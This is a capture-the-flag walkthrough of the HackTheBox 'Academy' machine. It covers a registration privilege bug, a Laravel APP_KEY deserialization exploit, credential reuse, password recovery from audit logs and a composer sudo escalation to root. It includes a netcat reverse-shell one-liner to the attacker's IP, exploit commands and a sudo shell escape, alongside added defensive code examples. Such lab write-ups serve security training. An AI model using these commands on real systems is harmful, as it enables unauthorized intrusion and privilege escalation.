# Academy

Academy is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/297), created by egre55 and mrb3n. In this post, my IP is 10.10.14.44 and the target IP is 10.129.167.56.

This machine features an Apache server hosting a PHP website. The website doesn't look special until you intercept the registration request, where changing an obvious parameter elevates the privileges of the account you create. Fuzzing the website then reveals an admin login URL, and the admin panel points to a sub-domain that exposes Laravel error pages, which leak the APP\_KEY needed for an RCE exploit. Inside the machine, several techniques are used to pivot between users and finally to become root.

### Recon

The first steps are about gathering basic information on the target, using nmap and looking at the website.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.167.56

Pinging 10.129.167.56 with 32 bytes of data:
Reply from 10.129.167.56: bytes=32 time=141ms TTL=63
Reply from 10.129.167.56: bytes=32 time=173ms TTL=63
Reply from 10.129.167.56: bytes=32 time=142ms TTL=63
Reply from 10.129.167.56: bytes=32 time=144ms TTL=63

Ping statistics for 10.129.167.56:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 141ms, Maximum = 173ms, Average = 150ms
```

{% endcode %}

From the TTL (63), we can assume it is a Linux machine.

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.167.56 -oN Ports

Nmap scan report for 10.129.167.56
Host is up, received reset ttl 63 (0.16s latency).
Scanned at 2023-06-06 10:37:16 Pacific SA Standard Time for 16s
Not shown: 65283 closed tcp ports (reset), 249 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
33060/tcp open  mysqlx  syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
           Raw packets sent: 76803 (3.379MB) | Rcvd: 74737 (2.990MB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target

Nmap scan report for 10.129.167.56
Host is up (0.15s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=6/6%Time=647F44D8%P=i686-pc-windows-windows%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.95 seconds
```

{% endcode %}

If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 launchpad", you can find the specific Ubuntu release; in this case the result was "Ubuntu Focal". This can be useful when looking for a vulnerability in a specific version.

What we know so far: a website on port 80 served by Apache/2.4.41, and an open **mysqlx** service on port 33060 that gives no useful response for now.

Because of the message "Did not follow redirect to <http://academy.htb/>", we have to [add the hostname to /etc/hosts](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/add-host).

{% code title="Local Terminal" %}

```bash
$ whatweb http://academy.htb

http://academy.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.167.56], 
Title[Hack The Box Academy]
```

{% endcode %}

* Browser: <http://academy.htb/>

If you go to Login, the URL is "<http://academy.htb/login.php>", so this is a good opportunity to fuzz for files with the .php extension.

{% code title="Local Terminal" %}

```bash
wfuzz -c -f PHPfuzz -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://academy.htb/FUZZ.php
```

{% endcode %}

```
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://academy.htb/FUZZ.php
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        76 L     131 W      2117 Ch     "index"
000000039:   200        141 L    226 W      2627 Ch     "login"
000000245:   200        141 L    227 W      2633 Ch     "admin"
000000024:   302        1049 L   4114 W     55034 Ch    "home"
000000051:   200        148 L    247 W      3003 Ch     "register"
000001476:   200        0 L      0 W        0 Ch        "config"
000045226:   403        9 L      28 W       276 Ch      "http://academy.htb/.php"
```

* index.php: nothing interesting.
* login.php: useful after registration.
* admin.php: admin login panel, could be useful.
* home.php: redirects to login.php.
* register.php: registration form.
* config.php: 403, empty.

Our next step is to intercept the registration request with Burp Suite.

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FMoMU2zLR3nj4447zL9UM%2Fimage.png?alt=media\&token=fd94bd1b-4e41-4377-b7b5-b653c86a709f)

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSEeTqdBq5g7f7PXqLN2g%2Fimage.png?alt=media&#x26;token=8b580644-959d-4d10-9562-26d625d5d91a" alt=""><figcaption><p>Interception result</p></figcaption></figure>

### Exploitation

In the intercepted request, among the parameters there is a "roleid"; earlier we found an admin.php.

So our best move is to change the roleid to 1 and create a new account.
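The flaw above is a mass-assignment bug: the server copies a client-controlled `roleid` into the new account. Added example, not the Academy application's code: a minimal registration handler in Python showing that behaviour beside a hardened version that allow-lists the fields a self-service registration may set and decides the role server-side. The field names follow the intercepted request; the role values, the in-memory `users` store and the `unexpected_fields` helper are assumptions made for the example.

```python
import hashlib
import os
from typing import Dict, List

# Assumed role values: the writeup sets roleid=1 to reach admin.php, and the
# registration form sends a lower value by default.
ROLE_USER = 0
ROLE_ADMIN = 1

# Fields a self-service registration form is allowed to set (assumption).
REGISTRATION_FIELDS = {"uid", "password"}


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as salt:hash (both hex)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"{salt.hex()}:{digest.hex()}"


def register_vulnerable(form: Dict[str, str], users: Dict[str, dict]) -> dict:
    """Mass assignment: whatever roleid the client sends becomes the account's role."""
    account = {
        "uid": form["uid"],
        "password": hash_password(form["password"]),
        "roleid": int(form.get("roleid", ROLE_USER)),  # trusted straight from the request
    }
    users[account["uid"]] = account
    return account


def unexpected_fields(form: Dict[str, str]) -> List[str]:
    """Fields the client sent that registration has no business accepting; worth logging."""
    return sorted(set(form) - REGISTRATION_FIELDS)


def register_hardened(form: Dict[str, str], users: Dict[str, dict]) -> dict:
    """Allow-list the input and decide the role server-side, never from the form."""
    account = {
        "uid": form["uid"],
        "password": hash_password(form["password"]),
        "roleid": ROLE_USER,  # privilege is a server decision (an admin promotes later)
    }
    users[account["uid"]] = account
    return account


def can_access_admin(account: dict) -> bool:
    """The check admin.php would make before rendering the panel."""
    return account["roleid"] == ROLE_ADMIN


if __name__ == "__main__":
    db: Dict[str, dict] = {}
    # Constructed request: the same body as the intercepted one, with roleid set to 1.
    tampered = {"uid": "newuser", "password": "hunter2", "roleid": "1"}
    print("vulnerable handler grants admin:", can_access_admin(register_vulnerable(tampered, db)))
    print("hardened handler grants admin:  ", can_access_admin(register_hardened(tampered, db)))
    print("fields the hardened handler ignored:", unexpected_fields(tampered))
```

In the hardened version the ignored `roleid` field is also a detection signal: a registration request carrying fields the form never sends is exactly what the Burp-modified request looks like from the server side.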

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSGqfDMRaUenR3d2Dl5NB%2Fimage.png?alt=media&#x26;token=9830ef7e-389f-441a-8654-a97b39440f95" alt=""><figcaption><p>Send this</p></figcaption></figure>

Then go to <http://academy.htb/admin.php> and log in with the new user. After this, you will see the following:

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fw0NfBL0yRIr7RCKVPHiD%2Fimage.png?alt=media&#x26;token=4e306385-15c2-4fba-ab24-79b5c680e194" alt=""><figcaption></figcaption></figure>

Hey! There is a subdomain; add it to /etc/hosts.

* <http://dev-staging-01.academy.htb/>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FiP6pghQzodTRhfYCdva3%2Fimage.png?alt=media&#x26;token=85dcef0a-da47-4311-91d1-b27580adc376" alt=""><figcaption></figcaption></figure>

### Reverse Shell \[www-data]

The website shows a Laravel error page, so it may be vulnerable to something; search for it at exploit-db.com. I tried [CVE-2021-3129](https://www.exploit-db.com/exploits/49424) but it doesn't work. [CVE-2018-15133](https://www.exploit-db.com/exploits/47129) requires Metasploit, but there are alternatives on GitHub.

{% embed url="<https://github.com/aljavier/exploit_laravel_cve-2018-15133>" %}

{% code title="Local Terminal" %}

```bash
git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133
```

{% endcode %}

The usage of the script is the following:

```
pwn_laravel.py [-h] [-c COMMAND] [-m {1,2,3,4}] [-i] URL API_KEY
```

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F0PSkcNDckwnE12ZBXHom%2Fimage.png?alt=media&#x26;token=fd5e4c1c-c55d-44eb-8a82-c8a2acafd251" alt=""><figcaption><p>API_key location</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive
```

{% endcode %}
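Why the leaked key is enough, as an added example that is not Laravel's code nor the exploit's: Laravel wraps every encrypted cookie and session value in a base64 JSON envelope with `iv`, `value` and `mac`, where `mac = HMAC-SHA256(APP_KEY, base64(iv) || base64(value))`, and only decrypts a value whose MAC verifies. The Python below models that envelope with the standard library; the AES-256-CBC encryption of `value` is omitted and a constructed placeholder ciphertext is used, because the integrity check does not depend on it. It shows that anything minted with the leaked key verifies, and that rotating APP_KEY (the remediation for this kind of exposure) makes every envelope built with the old key fail.

```python
import base64
import hashlib
import hmac
import json
import os

# The APP_KEY exposed by the dev-staging error page in the writeup.
LEAKED_APP_KEY = "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
IV_LENGTH = 16  # AES-256-CBC block size, the cipher Laravel pairs with a 32-byte key


def app_key_bytes(app_key: str) -> bytes:
    """Laravel stores the raw key base64-encoded behind a 'base64:' prefix."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    """hash_hmac('sha256', $iv . $value, $key), as Illuminate's Encrypter computes it."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def make_envelope(key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Build the base64(JSON{iv,value,mac}) string Laravel places in a cookie."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(payload).encode()).decode()


def verify_envelope(key: bytes, token: str) -> bool:
    """The structural and MAC checks Laravel performs before decrypting anything."""
    try:
        payload = json.loads(base64.b64decode(token, validate=True))
    except (ValueError, TypeError):
        return False
    if not isinstance(payload, dict) or not all(k in payload for k in ("iv", "value", "mac")):
        return False
    try:
        if len(base64.b64decode(payload["iv"], validate=True)) != IV_LENGTH:
            return False
    except (ValueError, TypeError):
        return False
    expected = laravel_mac(key, str(payload["iv"]), str(payload["value"]))
    return hmac.compare_digest(expected, str(payload["mac"]))


def rotate_app_key() -> str:
    """What `php artisan key:generate` does: a fresh random 32-byte key."""
    return "base64:" + base64.b64encode(os.urandom(32)).decode()


def tamper_value(token: str) -> str:
    """Flip one byte of the ciphertext field to show that the MAC catches it."""
    payload = json.loads(base64.b64decode(token))
    raw = bytearray(base64.b64decode(payload["value"]))
    raw[0] ^= 0x01
    payload["value"] = base64.b64encode(bytes(raw)).decode()
    return base64.b64encode(json.dumps(payload).encode()).decode()


if __name__ == "__main__":
    old_key = app_key_bytes(LEAKED_APP_KEY)
    token = make_envelope(old_key, os.urandom(IV_LENGTH), b"constructed-ciphertext")
    print("verifies under the leaked key:", verify_envelope(old_key, token))
    print("verifies after key rotation:  ", verify_envelope(app_key_bytes(rotate_app_key()), token))
    print("tampered value verifies:      ", verify_envelope(old_key, tamper_value(token)))
```

Because the MAC is the only thing standing between an attacker-supplied cookie and the application's unserialize step, the key is the whole secret: once it has been exposed through a debug page or a committed .env, rotating it and invalidating existing sessions is the fix, not merely turning debug mode off.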

Now open a new local terminal:

{% code title="Local Terminal B" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="CVE Interactive Terminal" %}

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 443 >/tmp/f
```

{% endcode %}

And you are in! Close the **CVE Interactive Terminal** and do a [**Bash Upgrade**](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade) in the other terminal.

### User Pivoting \[cry0l1t3]

{% code title="Target Terminal \[www-data]" %}

```bash
www-data@academy:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@academy:/var/www/html$ ls -la
total 20
drwxr-xr-x  4 root     root     4096 Aug 13  2020 .
drwxr-xr-x  3 root     root     4096 Aug  7  2020 ..
drwxr-xr-x 12 www-data www-data 4096 Aug 13  2020 academy
drwxr-xr-x 12 root     root     4096 Aug 13  2020 htb-academy-dev-01
-rw-r--r--  1 www-data www-data   50 Aug  9  2020 index.php

# We got in through the dev site, so it is a good idea to check the production application's files under academy/
www-data@academy:/var/www/html$ cd academy/

www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13  2020 .
drwxr-xr-x  4 root     root       4096 Aug 13  2020 ..
-rw-r--r--  1 www-data www-data    706 Aug 13  2020 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
<...>
```

{% endcode %}

There is an interesting hidden file called .env; type **cat .env**:

{% code title="Target Terminal \[www-data]" %}

```bash
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!! #Password!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
```

{% endcode %}

Now we can test that password against the other users; we can enumerate them in /home.

{% code title="Target Terminal \[www-data]" %}

```bash
www-data@academy:/home$ ls -l

total 32
drwxr-xr-x  2 21y4d    21y4d    4096 Aug 10  2020 21y4d
drwxr-xr-x  2 ch4p     ch4p     4096 Aug 10  2020 ch4p
drwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 cry0l1t3
drwxr-xr-x  3 egre55   egre55   4096 Aug 10  2020 egre55
drwxr-xr-x  2 g0blin   g0blin   4096 Aug 10  2020 g0blin
drwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12  2020 mrb3n
```

{% endcode %}

After trying { $user : mySup3rP4s5w0rd!! } for each user, the correct one is cry0l1t3.

{% code title="Target Terminal \[www-data]" %}

```bash
$ su cry0l1t3

$ cat /home/cry0l1t3/user.txt
```

{% endcode %}

### User Pivoting \[mrb3n]

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
```

{% endcode %}

The user belongs to the group **adm**, so maybe we can run a specific command or read some logs.

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
$ cd /

$ find . -group adm 2>/dev/null
<...>
./var/log/apt/term.log.3.gz
./var/log/apt/term.log.1.gz
./var/log/apt/term.log.4.gz
./var/log/apt/term.log
./var/log/audit
./var/log/audit/audit.log.2
./var/log/audit/audit.log
./var/log/audit/audit.log.3
./var/log/audit/audit.log.1
./var/log/syslog.4.gz
./var/log/syslog.7.gz
./var/log/auth.log.2.gz
./var/log/auth.log.1
./var/log/syslog.3.gz
<...>
```

{% endcode %}

Usually the logs located in /var/log/audit/ are important, but they contain a LOT of information; a good alternative is to use grep to find the relevant data.

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
$ cd /var/log/audit/

# Remember that our current uid is 1002, so we need another one.
$ grep -r "uid=1001" | grep "cmd"
audit.log:type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success'
<...>

# From here, we want the hex string
# 2F7573722F62696E2F656469746F72202D2D202F
# between "cmd=" and " terminal="
```

{% endcode %}

From here, we want the hex-encoded string, like "2F7573722F62696E2F656469746F72202D2D202F", between **cmd=** and **terminal=**, and decode it with **xxd -ps -r**.

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r "uid=1001" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r
```

{% endcode %}

Nothing useful here; now we will test with uid=1000.

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r "uid=1000" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r
```

{% endcode %}

But there are other interesting rows, the ones that contain "type=TTY" and "data=".

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r tty | grep -oP '(?<=data=).*' | sort -u | xxd -ps -r ; echo
```

{% endcode %}

```bash
exithistory
mrb3n_Ac@d3my!
su mrb3n
whoami
cat dat
<...>
```
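Added example, not from the writeup: a small Python parser for the two auditd record types mined above, `USER_CMD` (sudo logs the command hex-encoded in `cmd=`) and `TTY` (keystrokes hex-encoded in `data=`), with a check that flags decoded sudo commands matching the composer `run-script` pattern, which is the same sudo technique the privilege escalation section below relies on. The USER_CMD sample lines are the three records shown above; the two TTY lines are constructed, re-encoding the `su mrb3n` and password keystrokes the writeup recovered, since the raw TTY records were not shown. The regexes, field handling and the `SHELL_ESCAPE_PATTERNS` list are assumptions made for this example.

```python
import re
from typing import Dict, List, Optional

# Sample audit.log content. The USER_CMD lines are the ones shown in the writeup; the TTY
# lines are constructed (auditd's record layout, with data= re-encoding the recovered
# keystrokes and 0x0D standing for Enter).
SAMPLE_AUDIT_LOG = """\
type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success'
type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success'
type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success'
type=TTY msg=audit(1612880420.101:97): tty pid=1290 uid=1002 auid=1002 ses=2 major=4 minor=1 comm="bash" data=7375206D7262336E0D
type=TTY msg=audit(1612880423.555:98): tty pid=1291 uid=1002 auid=1002 ses=2 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210D
"""

HEADER_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):")
# key=value pairs: values are either double-quoted strings or unquoted tokens.
FIELD_RE = re.compile(r"(\w+)=(\"[^\"]*\"|[^\s']+)")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

# Decoded sudo commands that hand out a shell when the binary is allowed through sudo
# (GTFOBins-style); composer run-script is the one this box's sudo rule exposes.
SHELL_ESCAPE_PATTERNS = [
    re.compile(r"\bcomposer\b.*\brun-script\b"),
    re.compile(r"(^|\s)/bin/(ba)?sh\b"),
]


def decode_field(value: str) -> str:
    """auditd hex-encodes values containing spaces or control chars; quoted ones are literal."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1]
    if HEX_RE.match(value) and len(value) % 2 == 0:
        return bytes.fromhex(value).decode("utf-8", errors="replace")
    return value


def parse_records(text: str) -> List[Dict]:
    """One dict per record, with the hex command or keystrokes already decoded."""
    records = []
    for line in text.splitlines():
        head = HEADER_RE.match(line)
        if not head:
            continue
        fields = dict(FIELD_RE.findall(line[head.end():]))
        rec = {"type": head["type"], "ts": float(head["ts"]), "serial": int(head["serial"]),
               "uid": fields.get("uid"), "auid": fields.get("auid"), "decoded": None}
        if rec["type"] == "USER_CMD" and "cmd" in fields:
            rec["decoded"] = decode_field(fields["cmd"])
        elif rec["type"] == "TTY" and "data" in fields:
            rec["decoded"] = decode_field(fields["data"]).rstrip("\r\n")
        records.append(rec)
    return records


def _select(records: List[Dict], rtype: str, auid: Optional[str]) -> List[str]:
    return [r["decoded"] for r in records
            if r["type"] == rtype and r["decoded"] is not None
            and (auid is None or r["auid"] == auid)]


def sudo_commands(records: List[Dict], auid: Optional[str] = None) -> List[str]:
    """Commands run through sudo, optionally only for one login uid (auid)."""
    return _select(records, "USER_CMD", auid)


def tty_keystrokes(records: List[Dict], auid: Optional[str] = None) -> List[str]:
    """Lines typed at audited terminals; this is where the writeup found a password."""
    return _select(records, "TTY", auid)


def flag_shell_escapes(records: List[Dict]) -> List[str]:
    """Sudo commands that match a known shell-escape pattern."""
    return [c for c in sudo_commands(records) if any(p.search(c) for p in SHELL_ESCAPE_PATTERNS)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_AUDIT_LOG)
    for cmd in sudo_commands(recs, auid="1001"):
        print("sudo:", cmd)
    for line in tty_keystrokes(recs):
        print("tty :", line)
    print("flagged:", flag_shell_escapes(recs))
```

Two defensive points fall out of the sample. TTY auditing (`pam_tty_audit`) records passwords typed at `su`/`sudo` prompts unless `disable=*` / `log_passwd` are configured with care, and the resulting logs are readable by group **adm**, which is why that group membership was enough to pivot. And the USER_CMD record for `composer ... run-script` is the sudo privilege escalation itself, visible in the log before the root shell exists.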

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
su mrb3n   # Password: mrb3n_Ac@d3my!
```

{% endcode %}

### Privilege Escalation

{% code title="Target Terminal \[mrb3n]" %}

```bash
$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
```

{% endcode %}

At GTFOBins there is a way to escalate privileges with sudo using composer:

{% embed url="<https://gtfobins.github.io/gtfobins/composer/#sudo>" %}

{% code title="Target Terminal \[mrb3n]" %}

```bash
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
$ whoami
root

$ cat /root/root.txt
e13da1f49d8d784bffa5504154a3d8f8
```

{% endcode %}
